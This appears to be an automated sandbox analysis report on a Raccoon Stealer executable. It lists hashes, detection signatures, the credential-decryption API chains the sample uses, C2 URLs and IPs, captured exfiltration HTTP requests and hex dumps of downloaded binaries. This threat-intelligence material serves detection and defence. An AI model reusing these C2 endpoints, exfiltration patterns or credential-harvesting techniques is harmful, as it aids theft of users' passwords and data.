Windows Analysis Report KqxsoH2Rhn.exe

Overview

General Information

Sample Name: KqxsoH2Rhn.exe
Analysis ID: 518394
MD5: fa5e0b9dd2cd2684fb54cc7f39f229b6
SHA1: 9f36eb3d78929f1877f0e4f4b2fa74eb580bac17
SHA256: 67a5471d59ca74d55eda2a899d27e0c650b4bd66747461f1bdda634dc96d0c18
Tags: exe, RaccoonStealer

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Tries to steal Mail credentials (via file / registry access)
Contains functionality to steal Internet Explorer form passwords
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sigma detected: Suspicious Del in CommandLine
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Binary contains a suspicious time stamp
PE file contains more sections than normal
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: KqxsoH2Rhn.exe Virustotal: Detection: 35%
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.KqxsoH2Rhn.exe.48b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.KqxsoH2Rhn.exe.47a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.378040707.00000000047A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.377370731.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.283534842.00000000048B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KqxsoH2Rhn.exe PID: 6984, type: MEMORYSTR
Machine Learning detection for sample
Source: KqxsoH2Rhn.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040E727 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, 1_2_0040E727
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040CB54 __EH_prolog,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,LocalAlloc,BCryptDecrypt,BCryptCloseAlgorithmProvider,BCryptDestroyKey, 1_2_0040CB54
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040D560 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, 1_2_0040D560
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0042770E CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 1_2_0042770E
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040F78B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, 1_2_0040F78B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_004278E1 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 1_2_004278E1
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0040DC7B __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, 1_2_0040DC7B
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0041E52C __EH_prolog,_strlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,PK11_FreeSlot, 1_2_0041E52C

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Unpacked PE file: 1.2.KqxsoH2Rhn.exe.400000.0.unpack
Uses 32bit PE files
Source: KqxsoH2Rhn.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.378846446.000000006EBE0000.00000002.00020000.sdmp, nss3.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: KqxsoH2Rhn.exe, 00000001.00000003.370376940.000000004DC97000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
Source: Binary string: C:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KqxsoH2Rhn.exe, 00000001.00000002.379023402.000000006FB09000.00000002.00020000.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr
Source: Binary string: aC:\zihiwimugugi93\ragos 20\kusawuv\15.pdb source: KqxsoH2Rhn.exe
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 1_2_0043DA90
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_0045E752 FindFirstFileExW, 1_2_0045E752
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe Code function: 1_2_00434721 __EH_prolog,GetLogicalDriveStringsA, 1_2_00434721
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\KqxsoH2Rhn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49744 -> 194.180.174.182:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49744 -> 194.180.174.182:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://178.23.190.57/rino115sipsip
Source: Malware configuration extractor URLs: http://91.219.236.162/rino115sipsip
Source: Malware configuration extractor URLs: http://185.163.47.176/rino115sipsip
Source: Malware configuration extractor URLs: http://193.38.54.238/rino115sipsip
Source: Malware configuration extractor URLs: http://74.119.192.122/rino115sipsip
Source: Malware configuration extractor URLs: http://91.219.236.240/rino115sipsip
Source: Malware configuration extractor URLs: https://t.me/rino115sipsip
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SERVERASTRA-ASHU SERVERASTRA-ASHU
Source: Joe Sandbox View ASN Name: MIVOCLOUDMD MIVOCLOUDMD
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rino115sipsip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.47.176
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.182
Source: global traffic HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/e2fece3ec028ffea81a6e29ab137c790945d5c2c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182
Source: global traffic HTTP traffic detected: GET //l/f/qaHR_HwB3dP17SpzJnqt/553beaf07e7bcfa31cdc14361c20d4ecff5638ed HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.182
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 54954Host: 194.180.174.182
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.219.236.162 91.219.236.162
Source: Joe Sandbox View IP Address: 91.219.236.162 91.219.236.162
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 09 Nov 2021 11:38:28 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 09 Nov 2021 11:38:32 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc 
ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.57
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.57
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.57
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.57
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.162
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 185.163.47.176
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.182
